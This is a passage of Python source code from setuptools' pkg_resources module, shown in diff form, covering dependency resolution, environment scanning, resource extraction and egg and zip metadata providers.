returned. - """ - dist = self.by_key.get(req.key) - if dist is not None and dist not in req: - # XXX add more info - raise VersionConflict(dist, req) - return dist - - def iter_entry_points(self, group, name=None): - """Yield entry point objects from `group` matching `name` - - If `name` is None, yields all entry points in `group` from all - distributions in the working set, otherwise only ones matching - both `group` and `name` are yielded (in distribution order). - """ - return ( - entry - for dist in self - for entry in dist.get_entry_map(group).values() - if name is None or name == entry.name - ) - - def run_script(self, requires, script_name): - """Locate distribution for `requires` and run `script_name` script""" - ns = sys._getframe(1).f_globals - name = ns['__name__'] - ns.clear() - ns['__name__'] = name - self.require(requires)[0].run_script(script_name, ns) - - def __iter__(self): - """Yield distributions for non-duplicate projects in the working set - - The yield order is the order in which the items' path entries were - added to the working set. - """ - seen = {} - for item in self.entries: - if item not in self.entry_keys: - # workaround a cache issue - continue - - for key in self.entry_keys[item]: - if key not in seen: - seen[key] = 1 - yield self.by_key[key] - - def add(self, dist, entry=None, insert=True, replace=False): - """Add `dist` to working set, associated with `entry` - - If `entry` is unspecified, it defaults to the ``.location`` of `dist`. - On exit from this routine, `entry` is added to the end of the working - set's ``.entries`` (if it wasn't already present). - - `dist` is only added to the working set if it's for a project that - doesn't already have a distribution in the set, unless `replace=True`. - If it's added, any callbacks registered with the ``subscribe()`` method - will be called. - """ - if insert: - dist.insert_on(self.entries, entry, replace=replace) - - if entry is None: - entry = dist.location - keys = self.entry_keys.setdefault(entry, []) - keys2 = self.entry_keys.setdefault(dist.location, []) - if not replace and dist.key in self.by_key: - # ignore hidden distros - return - - self.by_key[dist.key] = dist - if dist.key not in keys: - keys.append(dist.key) - if dist.key not in keys2: - keys2.append(dist.key) - self._added_new(dist) - - def resolve(self, requirements, env=None, installer=None, - replace_conflicting=False, extras=None): - """List all distributions needed to (recursively) meet `requirements` - - `requirements` must be a sequence of ``Requirement`` objects. `env`, - if supplied, should be an ``Environment`` instance. If - not supplied, it defaults to all distributions available within any - entry or distribution in the working set. `installer`, if supplied, - will be invoked with each requirement that cannot be met by an - already-installed distribution; it should return a ``Distribution`` or - ``None``. - - Unless `replace_conflicting=True`, raises a VersionConflict exception - if - any requirements are found on the path that have the correct name but - the wrong version. Otherwise, if an `installer` is supplied it will be - invoked to obtain the correct version of the requirement and activate - it. - - `extras` is a list of the extras to be used with these requirements. - This is important because extra requirements may look like `my_req; - extra = "my_extra"`, which would otherwise be interpreted as a purely - optional requirement. Instead, we want to be able to assert that these - requirements are truly required. - """ - - # set up the stack - requirements = list(requirements)[::-1] - # set of processed requirements - processed = {} - # key -> dist - best = {} - to_activate = [] - - req_extras = _ReqExtras() - - # Mapping of requirement to set of distributions that required it; - # useful for reporting info about conflicts. - required_by = collections.defaultdict(set) - - while requirements: - # process dependencies breadth-first - req = requirements.pop(0) - if req in processed: - # Ignore cyclic or redundant dependencies - continue - - if not req_extras.markers_pass(req, extras): - continue - - dist = best.get(req.key) - if dist is None: - # Find the best distribution and add it to the map - dist = self.by_key.get(req.key) - if dist is None or (dist not in req and replace_conflicting): - ws = self - if env is None: - if dist is None: - env = Environment(self.entries) - else: - # Use an empty environment and workingset to avoid - # any further conflicts with the conflicting - # distribution - env = Environment([]) - ws = WorkingSet([]) - dist = best[req.key] = env.best_match( - req, ws, installer, - replace_conflicting=replace_conflicting - ) - if dist is None: - requirers = required_by.get(req, None) - raise DistributionNotFound(req, requirers) - to_activate.append(dist) - if dist not in req: - # Oops, the "best" so far conflicts with a dependency - dependent_req = required_by[req] - raise VersionConflict(dist, req).with_context(dependent_req) - - # push the new requirements onto the stack - new_requirements = dist.requires(req.extras)[::-1] - requirements.extend(new_requirements) - - # Register the new requirements needed by req - for new_requirement in new_requirements: - required_by[new_requirement].add(req.project_name) - req_extras[new_requirement] = req.extras - - processed[req] = True - - # return list of distros to activate - return to_activate - - def find_plugins( - self, plugin_env, full_env=None, installer=None, fallback=True): - """Find all activatable distributions in `plugin_env` - - Example usage:: - - distributions, errors = working_set.find_plugins( - Environment(plugin_dirlist) - ) - # add plugins+libs to sys.path - map(working_set.add, distributions) - # display errors - print('Could not load', errors) - - The `plugin_env` should be an ``Environment`` instance that contains - only distributions that are in the project's "plugin directory" or - directories. The `full_env`, if supplied, should be an ``Environment`` - contains all currently-available distributions. If `full_env` is not - supplied, one is created automatically from the ``WorkingSet`` this - method is called on, which will typically mean that every directory on - ``sys.path`` will be scanned for distributions. - - `installer` is a standard installer callback as used by the - ``resolve()`` method. The `fallback` flag indicates whether we should - attempt to resolve older versions of a plugin if the newest version - cannot be resolved. - - This method returns a 2-tuple: (`distributions`, `error_info`), where - `distributions` is a list of the distributions found in `plugin_env` - that were loadable, along with any other distributions that are needed - to resolve their dependencies. `error_info` is a dictionary mapping - unloadable plugin distributions to an exception instance describing the - error that occurred. Usually this will be a ``DistributionNotFound`` or - ``VersionConflict`` instance. - """ - - plugin_projects = list(plugin_env) - # scan project names in alphabetic order - plugin_projects.sort() - - error_info = {} - distributions = {} - - if full_env is None: - env = Environment(self.entries) - env += plugin_env - else: - env = full_env + plugin_env - - shadow_set = self.__class__([]) - # put all our entries in shadow_set - list(map(shadow_set.add, self)) - - for project_name in plugin_projects: - - for dist in plugin_env[project_name]: - - req = [dist.as_requirement()] - - try: - resolvees = shadow_set.resolve(req, env, installer) - - except ResolutionError as v: - # save error info - error_info[dist] = v - if fallback: - # try the next older version of project - continue - else: - # give up on this project, keep going - break - - else: - list(map(shadow_set.add, resolvees)) - distributions.update(dict.fromkeys(resolvees)) - - # success, no need to try any more versions of this project - break - - distributions = list(distributions) - distributions.sort() - - return distributions, error_info - - def require(self, *requirements): - """Ensure that distributions matching `requirements` are activated - - `requirements` must be a string or a (possibly-nested) sequence - thereof, specifying the distributions and versions required. The - return value is a sequence of the distributions that needed to be - activated to fulfill the requirements; all relevant distributions are - included, even if they were already activated in this working set. - """ - needed = self.resolve(parse_requirements(requirements)) - - for dist in needed: - self.add(dist) - - return needed - - def subscribe(self, callback, existing=True): - """Invoke `callback` for all distributions - - If `existing=True` (default), - call on all existing ones, as well. - """ - if callback in self.callbacks: - return - self.callbacks.append(callback) - if not existing: - return - for dist in self: - callback(dist) - - def _added_new(self, dist): - for callback in self.callbacks: - callback(dist) - - def __getstate__(self): - return ( - self.entries[:], self.entry_keys.copy(), self.by_key.copy(), - self.callbacks[:] - ) - - def __setstate__(self, e_k_b_c): - entries, keys, by_key, callbacks = e_k_b_c - self.entries = entries[:] - self.entry_keys = keys.copy() - self.by_key = by_key.copy() - self.callbacks = callbacks[:] - - -class _ReqExtras(dict): - """ - Map each requirement to the extras that demanded it. - """ - - def markers_pass(self, req, extras=None): - """ - Evaluate markers for req against each extra that - demanded it. - - Return False if the req has a marker and fails - evaluation. Otherwise, return True. - """ - extra_evals = ( - req.marker.evaluate({'extra': extra}) - for extra in self.get(req, ()) + (extras or (None,)) - ) - return not req.marker or any(extra_evals) - - -class Environment: - """Searchable snapshot of distributions on a search path""" - - def __init__( - self, search_path=None, platform=get_supported_platform(), - python=PY_MAJOR): - """Snapshot distributions available on a search path - - Any distributions found on `search_path` are added to the environment. - `search_path` should be a sequence of ``sys.path`` items. If not - supplied, ``sys.path`` is used. - - `platform` is an optional string specifying the name of the platform - that platform-specific distributions must be compatible with. If - unspecified, it defaults to the current platform. `python` is an - optional string naming the desired version of Python (e.g. ``'3.6'``); - it defaults to the current version. - - You may explicitly set `platform` (and/or `python`) to ``None`` if you - wish to map *all* distributions, not just those compatible with the - running platform or Python version. - """ - self._distmap = {} - self.platform = platform - self.python = python - self.scan(search_path) - - def can_add(self, dist): - """Is distribution `dist` acceptable for this environment? - - The distribution must match the platform and python version - requirements specified when this environment was created, or False - is returned. - """ - py_compat = ( - self.python is None - or dist.py_version is None - or dist.py_version == self.python - ) - return py_compat and compatible_platforms(dist.platform, self.platform) - - def remove(self, dist): - """Remove `dist` from the environment""" - self._distmap[dist.key].remove(dist) - - def scan(self, search_path=None): - """Scan `search_path` for distributions usable in this environment - - Any distributions found are added to the environment. - `search_path` should be a sequence of ``sys.path`` items. If not - supplied, ``sys.path`` is used. Only distributions conforming to - the platform/python version defined at initialization are added. - """ - if search_path is None: - search_path = sys.path - - for item in search_path: - for dist in find_distributions(item): - self.add(dist) - - def __getitem__(self, project_name): - """Return a newest-to-oldest list of distributions for `project_name` - - Uses case-insensitive `project_name` comparison, assuming all the - project's distributions use their project's name converted to all - lowercase as their key. - - """ - distribution_key = project_name.lower() - return self._distmap.get(distribution_key, []) - - def add(self, dist): - """Add `dist` if we ``can_add()`` it and it has not already been added - """ - if self.can_add(dist) and dist.has_version(): - dists = self._distmap.setdefault(dist.key, []) - if dist not in dists: - dists.append(dist) - dists.sort(key=operator.attrgetter('hashcmp'), reverse=True) - - def best_match( - self, req, working_set, installer=None, replace_conflicting=False): - """Find distribution best matching `req` and usable on `working_set` - - This calls the ``find(req)`` method of the `working_set` to see if a - suitable distribution is already active. (This may raise - ``VersionConflict`` if an unsuitable version of the project is already - active in the specified `working_set`.) If a suitable distribution - isn't active, this method returns the newest distribution in the - environment that meets the ``Requirement`` in `req`. If no suitable - distribution is found, and `installer` is supplied, then the result of - calling the environment's ``obtain(req, installer)`` method will be - returned. - """ - try: - dist = working_set.find(req) - except VersionConflict: - if not replace_conflicting: - raise - dist = None - if dist is not None: - return dist - for dist in self[req.key]: - if dist in req: - return dist - # try to download/install - return self.obtain(req, installer) - - def obtain(self, requirement, installer=None): - """Obtain a distribution matching `requirement` (e.g. via download) - - Obtain a distro that matches requirement (e.g. via download). In the - base ``Environment`` class, this routine just returns - ``installer(requirement)``, unless `installer` is None, in which case - None is returned instead. This method is a hook that allows subclasses - to attempt other ways of obtaining a distribution before falling back - to the `installer` argument.""" - if installer is not None: - return installer(requirement) - - def __iter__(self): - """Yield the unique project names of the available distributions""" - for key in self._distmap.keys(): - if self[key]: - yield key - - def __iadd__(self, other): - """In-place addition of a distribution or environment""" - if isinstance(other, Distribution): - self.add(other) - elif isinstance(other, Environment): - for project in other: - for dist in other[project]: - self.add(dist) - else: - raise TypeError("Can't add %r to environment" % (other,)) - return self - - def __add__(self, other): - """Add an environment or distribution to an environment""" - new = self.__class__([], platform=None, python=None) - for env in self, other: - new += env - return new - - -# XXX backward compatibility -AvailableDistributions = Environment - - -class ExtractionError(RuntimeError): - """An error occurred extracting a resource - - The following attributes are available from instances of this exception: - - manager - The resource manager that raised this exception - - cache_path - The base directory for resource extraction - - original_error - The exception instance that caused extraction to fail - """ - - -class ResourceManager: - """Manage resource extraction and packages""" - extraction_path = None - - def __init__(self): - self.cached_files = {} - - def resource_exists(self, package_or_requirement, resource_name): - """Does the named resource exist?""" - return get_provider(package_or_requirement).has_resource(resource_name) - - def resource_isdir(self, package_or_requirement, resource_name): - """Is the named resource an existing directory?""" - return get_provider(package_or_requirement).resource_isdir( - resource_name - ) - - def resource_filename(self, package_or_requirement, resource_name): - """Return a true filesystem path for specified resource""" - return get_provider(package_or_requirement).get_resource_filename( - self, resource_name - ) - - def resource_stream(self, package_or_requirement, resource_name): - """Return a readable file-like object for specified resource""" - return get_provider(package_or_requirement).get_resource_stream( - self, resource_name - ) - - def resource_string(self, package_or_requirement, resource_name): - """Return specified resource as a string""" - return get_provider(package_or_requirement).get_resource_string( - self, resource_name - ) - - def resource_listdir(self, package_or_requirement, resource_name): - """List the contents of the named resource directory""" - return get_provider(package_or_requirement).resource_listdir( - resource_name - ) - - def extraction_error(self): - """Give an error message for problems extracting file(s)""" - - old_exc = sys.exc_info()[1] - cache_path = self.extraction_path or get_default_cache() - - tmpl = textwrap.dedent(""" - Can't extract file(s) to egg cache - - The following error occurred while trying to extract file(s) - to the Python egg cache: - - {old_exc} - - The Python egg cache directory is currently set to: - - {cache_path} - - Perhaps your account does not have write access to this directory? - You can change the cache directory by setting the PYTHON_EGG_CACHE - environment variable to point to an accessible directory. - """).lstrip() - err = ExtractionError(tmpl.format(**locals())) - err.manager = self - err.cache_path = cache_path - err.original_error = old_exc - raise err - - def get_cache_path(self, archive_name, names=()): - """Return absolute location in cache for `archive_name` and `names` - - The parent directory of the resulting path will be created if it does - not already exist. `archive_name` should be the base filename of the - enclosing egg (which may not be the name of the enclosing zipfile!), - including its ".egg" extension. `names`, if provided, should be a - sequence of path name parts "under" the egg's extraction location. - - This method should only be called by resource providers that need to - obtain an extraction location, and only for names they intend to - extract, as it tracks the generated names for possible cleanup later. - """ - extract_path = self.extraction_path or get_default_cache() - target_path = os.path.join(extract_path, archive_name + '-tmp', *names) - try: - _bypass_ensure_directory(target_path) - except Exception: - self.extraction_error() - - self._warn_unsafe_extraction_path(extract_path) - - self.cached_files[target_path] = 1 - return target_path - - @staticmethod - def _warn_unsafe_extraction_path(path): - """ - If the default extraction path is overridden and set to an insecure - location, such as /tmp, it opens up an opportunity for an attacker to - replace an extracted file with an unauthorized payload. Warn the user - if a known insecure location is used. - - See Distribute #375 for more details. - """ - if os.name == 'nt' and not path.startswith(os.environ['windir']): - # On Windows, permissions are generally restrictive by default - # and temp directories are not writable by other users, so - # bypass the warning. - return - mode = os.stat(path).st_mode - if mode & stat.S_IWOTH or mode & stat.S_IWGRP: - msg = ( - "%s is writable by group/others and vulnerable to attack " - "when " - "used with get_resource_filename. Consider a more secure " - "location (set with .set_extraction_path or the " - "PYTHON_EGG_CACHE environment variable)." % path - ) - warnings.warn(msg, UserWarning) - - def postprocess(self, tempname, filename): - """Perform any platform-specific postprocessing of `tempname` - - This is where Mac header rewrites should be done; other platforms don't - have anything special they should do. - - Resource providers should call this method ONLY after successfully - extracting a compressed resource. They must NOT call it on resources - that are already in the filesystem. - - `tempname` is the current (temporary) name of the file, and `filename` - is the name it will be renamed to by the caller after this routine - returns. - """ - - if os.name == 'posix': - # Make the resource executable - mode = ((os.stat(tempname).st_mode) | 0o555) & 0o7777 - os.chmod(tempname, mode) - - def set_extraction_path(self, path): - """Set the base path where resources will be extracted to, if needed. - - If you do not call this routine before any extractions take place, the - path defaults to the return value of ``get_default_cache()``. (Which - is based on the ``PYTHON_EGG_CACHE`` environment variable, with various - platform-specific fallbacks. See that routine's documentation for more - details.) - - Resources are extracted to subdirectories of this path based upon - information given by the ``IResourceProvider``. You may set this to a - temporary directory, but then you must call ``cleanup_resources()`` to - delete the extracted files when done. There is no guarantee that - ``cleanup_resources()`` will be able to remove all extracted files. - - (Note: you may not change the extraction path for a given resource - manager once resources have been extracted, unless you first call - ``cleanup_resources()``.) - """ - if self.cached_files: - raise ValueError( - "Can't change extraction path, files already extracted" - ) - - self.extraction_path = path - - def cleanup_resources(self, force=False): - """ - Delete all extracted resource files and directories, returning a list - of the file and directory names that could not be successfully removed. - This function does not have any concurrency protection, so it should - generally only be called when the extraction path is a temporary - directory exclusive to a single process. This method is not - automatically called; you must call it explicitly or register it as an - ``atexit`` function if you wish to ensure cleanup of a temporary - directory used for extractions. - """ - # XXX - - -def get_default_cache(): - """ - Return the ``PYTHON_EGG_CACHE`` environment variable - or a platform-relevant user cache dir for an app - named "Python-Eggs". - """ - return ( - os.environ.get('PYTHON_EGG_CACHE') - or platformdirs.user_cache_dir(appname='Python-Eggs') - ) - - -def safe_name(name): - """Convert an arbitrary string to a standard distribution name - - Any runs of non-alphanumeric/. characters are replaced with a single '-'. - """ - return re.sub('[^A-Za-z0-9.]+', '-', name) - - -def safe_version(version): - """ - Convert an arbitrary string to a standard version string - """ - try: - # normalize the version - return str(packaging.version.Version(version)) - except packaging.version.InvalidVersion: - version = version.replace(' ', '.') - return re.sub('[^A-Za-z0-9.]+', '-', version) - - -def safe_extra(extra): - """Convert an arbitrary string to a standard 'extra' name - - Any runs of non-alphanumeric characters are replaced with a single '_', - and the result is always lowercased. - """ - return re.sub('[^A-Za-z0-9.-]+', '_', extra).lower() - - -def to_filename(name): - """Convert a project or version name to its filename-escaped form - - Any '-' characters are currently replaced with '_'. - """ - return name.replace('-', '_') - - -def invalid_marker(text): - """ - Validate text as a PEP 508 environment marker; return an exception - if invalid or False otherwise. - """ - try: - evaluate_marker(text) - except SyntaxError as e: - e.filename = None - e.lineno = None - return e - return False - - -def evaluate_marker(text, extra=None): - """ - Evaluate a PEP 508 environment marker. - Return a boolean indicating the marker result in this environment. - Raise SyntaxError if marker is invalid. - - This implementation uses the 'pyparsing' module. - """ - try: - marker = packaging.markers.Marker(text) - return marker.evaluate() - except packaging.markers.InvalidMarker as e: - raise SyntaxError(e) - - -class NullProvider: - """Try to implement resources and metadata for arbitrary PEP 302 loaders""" - - egg_name = None - egg_info = None - loader = None - - def __init__(self, module): - self.loader = getattr(module, '__loader__', None) - self.module_path = os.path.dirname(getattr(module, '__file__', '')) - - def get_resource_filename(self, manager, resource_name): - return self._fn(self.module_path, resource_name) - - def get_resource_stream(self, manager, resource_name): - return io.BytesIO(self.get_resource_string(manager, resource_name)) - - def get_resource_string(self, manager, resource_name): - return self._get(self._fn(self.module_path, resource_name)) - - def has_resource(self, resource_name): - return self._has(self._fn(self.module_path, resource_name)) - - def _get_metadata_path(self, name): - return self._fn(self.egg_info, name) - - def has_metadata(self, name): - if not self.egg_info: - return self.egg_info - - path = self._get_metadata_path(name) - return self._has(path) - - def get_metadata(self, name): - if not self.egg_info: - return "" - path = self._get_metadata_path(name) - value = self._get(path) - if six.PY2: - return value - try: - return value.decode('utf-8') - except UnicodeDecodeError as exc: - # Include the path in the error message to simplify - # troubleshooting, and without changing the exception type. - exc.reason += ' in {} file at path: {}'.format(name, path) - raise - - def get_metadata_lines(self, name): - return yield_lines(self.get_metadata(name)) - - def resource_isdir(self, resource_name): - return self._isdir(self._fn(self.module_path, resource_name)) - - def metadata_isdir(self, name): - return self.egg_info and self._isdir(self._fn(self.egg_info, name)) - - def resource_listdir(self, resource_name): - return self._listdir(self._fn(self.module_path, resource_name)) - - def metadata_listdir(self, name): - if self.egg_info: - return self._listdir(self._fn(self.egg_info, name)) - return [] - - def run_script(self, script_name, namespace): - script = 'scripts/' + script_name - if not self.has_metadata(script): - raise ResolutionError( - "Script {script!r} not found in metadata at {self.egg_info!r}" - .format(**locals()), - ) - script_text = self.get_metadata(script).replace('\r\n', '\n') - script_text = script_text.replace('\r', '\n') - script_filename = self._fn(self.egg_info, script) - namespace['__file__'] = script_filename - if os.path.exists(script_filename): - source = open(script_filename).read() - code = compile(source, script_filename, 'exec') - exec(code, namespace, namespace) - else: - from linecache import cache - cache[script_filename] = ( - len(script_text), 0, script_text.split('\n'), script_filename - ) - script_code = compile(script_text, script_filename, 'exec') - exec(script_code, namespace, namespace) - - def _has(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _isdir(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _listdir(self, path): - raise NotImplementedError( - "Can't perform this operation for unregistered loader type" - ) - - def _fn(self, base, resource_name): - self._validate_resource_path(resource_name) - if resource_name: - return os.path.join(base, *resource_name.split('/')) - return base - - @staticmethod - def _validate_resource_path(path): - """ - Validate the resource paths according to the docs. - https://setuptools.readthedocs.io/en/latest/pkg_resources.html#basic-resource-access - - >>> warned = getfixture('recwarn') - >>> warnings.simplefilter('always') - >>> vrp = NullProvider._validate_resource_path - >>> vrp('foo/bar.txt') - >>> bool(warned) - False - >>> vrp('../foo/bar.txt') - >>> bool(warned) - True - >>> warned.clear() - >>> vrp('/foo/bar.txt') - >>> bool(warned) - True - >>> vrp('foo/../../bar.txt') - >>> bool(warned) - True - >>> warned.clear() - >>> vrp('foo/f../bar.txt') - >>> bool(warned) - False - - Windows path separators are straight-up disallowed. - >>> vrp(r'\\foo/bar.txt') - Traceback (most recent call last): - ... - ValueError: Use of .. or absolute path in a resource path \ -is not allowed. - - >>> vrp(r'C:\\foo/bar.txt') - Traceback (most recent call last): - ... - ValueError: Use of .. or absolute path in a resource path \ -is not allowed. - - Blank values are allowed - - >>> vrp('') - >>> bool(warned) - False - - Non-string values are not. - - >>> vrp(None) - Traceback (most recent call last): - ... - AttributeError: ... - """ - invalid = ( - os.path.pardir in path.split(posixpath.sep) or - posixpath.isabs(path) or - ntpath.isabs(path) - ) - if not invalid: - return - - msg = "Use of .. or absolute path in a resource path is not allowed." - - # Aggressively disallow Windows absolute paths - if ntpath.isabs(path) and not posixpath.isabs(path): - raise ValueError(msg) - - # for compatibility, warn; in future - # raise ValueError(msg) - warnings.warn( - msg[:-1] + " and will raise exceptions in a future release.", - DeprecationWarning, - stacklevel=4, - ) - - def _get(self, path): - if hasattr(self.loader, 'get_data'): - return self.loader.get_data(path) - raise NotImplementedError( - "Can't perform this operation for loaders without 'get_data()'" - ) - - -register_loader_type(object, NullProvider) - - -class EggProvider(NullProvider): - """Provider based on a virtual filesystem""" - - def __init__(self, module): - NullProvider.__init__(self, module) - self._setup_prefix() - - def _setup_prefix(self): - # we assume here that our metadata may be nested inside a "basket" - # of multiple eggs; that's why we use module_path instead of .archive - path = self.module_path - old = None - while path != old: - if _is_egg_path(path): - self.egg_name = os.path.basename(path) - self.egg_info = os.path.join(path, 'EGG-INFO') - self.egg_root = path - break - old = path - path, base = os.path.split(path) - - -class DefaultProvider(EggProvider): - """Provides access to package resources in the filesystem""" - - def _has(self, path): - return os.path.exists(path) - - def _isdir(self, path): - return os.path.isdir(path) - - def _listdir(self, path): - return os.listdir(path) - - def get_resource_stream(self, manager, resource_name): - return open(self._fn(self.module_path, resource_name), 'rb') - - def _get(self, path): - with open(path, 'rb') as stream: - return stream.read() - - @classmethod - def _register(cls): - loader_names = 'SourceFileLoader', 'SourcelessFileLoader', - for name in loader_names: - loader_cls = getattr(importlib_machinery, name, type(None)) - register_loader_type(loader_cls, cls) - - -DefaultProvider._register() - - -class EmptyProvider(NullProvider): - """Provider that returns nothing for all requests""" - - module_path = None - - _isdir = _has = lambda self, path: False - - def _get(self, path): - return '' - - def _listdir(self, path): - return [] - - def __init__(self): - pass - - -empty_provider = EmptyProvider() - - -class ZipManifests(dict): - """ - zip manifest builder - """ - - @classmethod - def build(cls, path): - """ - Build a dictionary similar to the zipimport directory - caches, except instead of tuples, store ZipInfo objects. - - Use a platform-specific path separator (os.sep) for the path keys - for compatibility with pypy on Windows. - """ - with zipfile.ZipFile(path) as zfile: - items = ( - ( - name.replace('/', os.sep), - zfile.getinfo(name), - ) - for name in zfile.namelist() - ) - return dict(items) - - load = build - - -class MemoizedZipManifests(ZipManifests): - """ - Memoized zipfile manifests. - """ - manifest_mod = collections.namedtuple('manifest_mod', 'manifest mtime') - - def load(self, path): - """ - Load a manifest at path or return a suitable manifest already loaded. - """ - path = os.path.normpath(path) - mtime = os.stat(path).st_mtime - - if path not in self or self[path].mtime != mtime: - manifest = self.build(path) - self[path] = self.manifest_mod(manifest, mtime) - - return self[path].manifest - - -class ZipProvider(EggProvider): - """Resource support for zips and eggs""" - - eagers = None - _zip_manifests = MemoizedZipManifests() - - def __init__(self, module): - EggProvider.__init__(self, module) - self.zip_pre = self.loader.archive + os.sep - - def _zipinfo_name(self, fspath): - # Convert a virtual filename (full path to file) into a zipfile subpath - # usable with the zipimport directory cache for our target archive - fspath = fspath.rstrip(os.sep) - if fspath == self.loader.archive: - return '' - if fspath.startswith(self.zip_pre): - return fspath[len(self.zip_pre):] - raise AssertionError( - "%s is not a subpath of %s" % (fspath, self.zip_pre) - ) - - def _parts(self, zip_path): - # Convert a zipfile subpath into an egg-relative path part list. - # pseudo-fs path - fspath = self.zip_pre + zip_path - if fspath.startswith(self.egg_root + os.sep): - return fspath[len(self.egg_root) + 1:].split(os.sep) - raise AssertionError( - "%s is not a subpath of %s" % (fspath, self.egg_root) - ) - - @property - def zipinfo(self): - return self._zip_manifests.load(self.loader.archive) - - def get_resource_filename(self, manager, resource_name): - if not self.egg_name: - raise NotImplementedError( - "resource_filename() only supported for .egg, not .zip" - ) - # no need to lock for extraction, since we use temp names - zip_path = self._resource_to_zip(resource_name) - eagers = self._get_eager_resources() - if '/'.join(self._parts(zip_path)) in eagers: - for name in eagers: - self._extract_resource(manager, self._eager_to_zip(name)) - return self._extract_resource(manager, zip_path) - - @staticmethod - def _get_date_and_size(zip_stat): - size = zip_stat.file_size - # ymdhms+wday, yday, dst - date_time = zip_stat.date_time + (0, 0, -1) - # 1980 offset already done - timestamp = time.mktime(date_time) - return timestamp, size - - def _extract_resource(self, manager, zip_path): - - if zip_path in self._index(): - for name in self._index()[zip_path]: - last = self._extract_resource( - manager, os.path.join(zip_path, name) - ) - # return the extracted directory name - return os.path.dirname(last) - - timestamp, size = self._get_date_and_size(self.zipinfo[zip_path]) - - if not WRITE_SUPPORT: - raise IOError('"os.rename" and "os.unlink" are not supported ' - 'on this platform') - try: - - real_path = manager.get_cache_path( - self.egg_name, self._parts(zip_path) - ) - - if self._is_current(real_path, zip_path): - return real_path - - outf, tmpnam = _mkstemp( - ".$extract", - dir=os.path.dirname(real_path), - ) - os.write(outf, self.loader.get_data(zip_path)) - os.close(outf) - utime(tmpnam, (timestamp, timestamp)) - manager.postprocess(tmpnam, real_path) - - try: - rename(tmpnam, real_path) - - except os.error: - if os.path.isfile(real_path): - if self._is_current(real_path, zip_path): - # the file became current since it was checked above, - # so proceed. - return real_path - # Windows, del old file and retry - elif os.name == 'nt': - unlink(real_path) - rename(tmpnam, real_path) - return real_path - raise - - except os.error: - # report a user-friendly error - manager.extraction_error() - - return real_path - - def _is_current(self, file_path, zip_path): - """ - Return True if the file_path is current for this zip_path - """ - timestamp, size = self._get_date_and_size(self.zipinfo[zip_path]) - if not os.path.isfile(file_path): - return False - stat = os.stat(file_path) - if stat.st_size != size or stat.st_mtime != timestamp: - return False - # check that the contents match - zip_contents = self.loader.get_data(zip_path) - with open(file_path, 'rb') as f: - file_contents = f.read() - return zip_contents == file_contents - - def _get_eager_resources(self): - if self.eagers is None: - eagers = [] - for name in ('native_libs.txt', 'eager_resources.txt'): - if self.has_metadata(name): - eagers.extend(self.get_metadata_lines(name)) - self.eagers = eagers - return self.eagers - - def _index(self): - try: - return self._dirindex - except AttributeError: - ind = {} - for path in self.zipinfo: - parts = path.split(os.sep) - while parts: - parent = os.sep.join(parts[:-1]) - if parent in ind: - ind[parent].append(parts[-1]) - break - else: - ind[parent] = [parts.pop()] - self._dirindex = ind - return ind - - def _has(self, fspath): - zip_path = self._zipinfo_name(fspath) - return zip_path in self.zipinfo or zip_path in self._index() - - def _isdir(self, fspath): - return self._zipinfo_name(fspath) in self._index() - - def _listdir(self, fspath): - return list(self._index().get(self._zipinfo_name(fspath), ())) - - def _eager_to_zip(self, resource_name): - return self._zipinfo_name(self._fn(self.egg_root, resource_name)) - - def _resource_to_zip(self, resource_name): - return self._zipinfo_name(self._fn(self.module_path, resource_name)) - - -register_loader_type(zipimport.zipimporter, ZipProvider) - - -class FileMetadata(EmptyProvider): - """Metadata handler for standalone PKG-INFO files - - Usage:: - - metadata = FileMetadata("/path/to/PKG-INFO") - - This provider rejects all data and metadata requests except for PKG-INFO, - which is treated as existing, and will be the contents of the file at - the provided location. - """ - - def __init__(self, path): - self.path = path - - def _get_metadata_path(self, name): - return self.path - - def has_metadata(self, name): - return name == 'PKG-INFO' and os.path.isfile(self.path) - - def get_metadata(self, name): - if name != 'PKG-INFO': - raise KeyError("No metadata except PKG-INFO is available") - - with io.open(self.path, encoding='utf-8', errors="replace") as f: - metadata = f.read() - self._warn_on_replacement(metadata) - return metadata - - def _warn_on_replacement(self, metadata): - # Python 2.7 compat for: replacement_char = '�' - replacement_char = b'\xef\xbf\xbd'.decode('utf-8') - if replacement_char in metadata: - tmpl = "{self.path} could not be properly decoded in UTF-8" - msg = tmpl.format(**locals()) - warnings.warn(msg) - - def get_metadata_lines(self, name): - return yield_lines(self.get_metadata(name)) - - -class PathMetadata(DefaultProvider): - """Metadata provider for egg directories - - Usage:: - - # Development eggs: - - egg_info = "/path/to/PackageName.egg-info" - base_dir = os.path.dirname(egg_info) - metadata = PathMetadata(base_dir, egg_info) - dist_name = os.path.splitext(os.path.basename(egg_info))[0] - dist = Distribution(basedir, project_name=dist_name, metadata=metadata) - - # Unpacked egg directories: - - egg_path = "/path/to/PackageName-ver-pyver-etc.egg" - metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO')) - dist = Distribution.from_filename(egg_path, metadata=metadata) - """ - - def __init__(self, path, egg_info): - self.module_path = path - self.egg_info = egg_info - - -class EggMetadata(ZipProvider): - """Metadata provider for .egg files""" - - def __init__(self, importer): - """Create a metadata provider from a zipimporter""" - - self.zip_pre = importer.archive + os.sep - self.loader = importer - if importer.prefix: - self.module_path = os.path.join(importer.archive, importer.prefix) - else: - self.module_path = importer.archive - self._setup_prefix() - - -_declare_state('dict', _distribution_finders={}) - - -def register_finder(importer_type, distribution_finder): - """Register `distribution_finder` to find distributions in sys.path items - - `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item - handler), and `distribution_finder` is a callable that, passed a path - item and the importer instance, yields ``Distribution`` instances found on - that path item. See ``pkg_resources.find_on_path`` for an example.""" - _distribution_finders[importer_type] = distribution_finder - - -def find_distributions(path_item, only=False): - """Yield distributions accessible via `path_item`""" - importer = get_importer(path_item) - finder = _find_adapter(_distribution_finders, importer) - return finder(importer, path_item, only) - - -def find_eggs_in_zip(importer, path_item, only=False): - """ - Find eggs in zip files; possibly multiple nested eggs. - """ - if importer.archive.endswith('.whl'): - # wheels are not supported with this finder - # they don't have PKG-INFO metadata, and won't ever contain eggs - return - metadata = EggMetadata(importer) - if metadata.has_metadata('PKG-INFO'): - yield Distribution.from_filename(path_item, metadata=metadata) - if only: - # don't yield nested distros - return - for subitem in metadata.resource_listdir(''): - if _is_egg_path(subitem): - subpath = os.path.join(path_item, subitem) - dists = find_eggs_in_zip(zipimport.zipimporter(subpath), subpath) - for dist in dists: - yield dist - elif 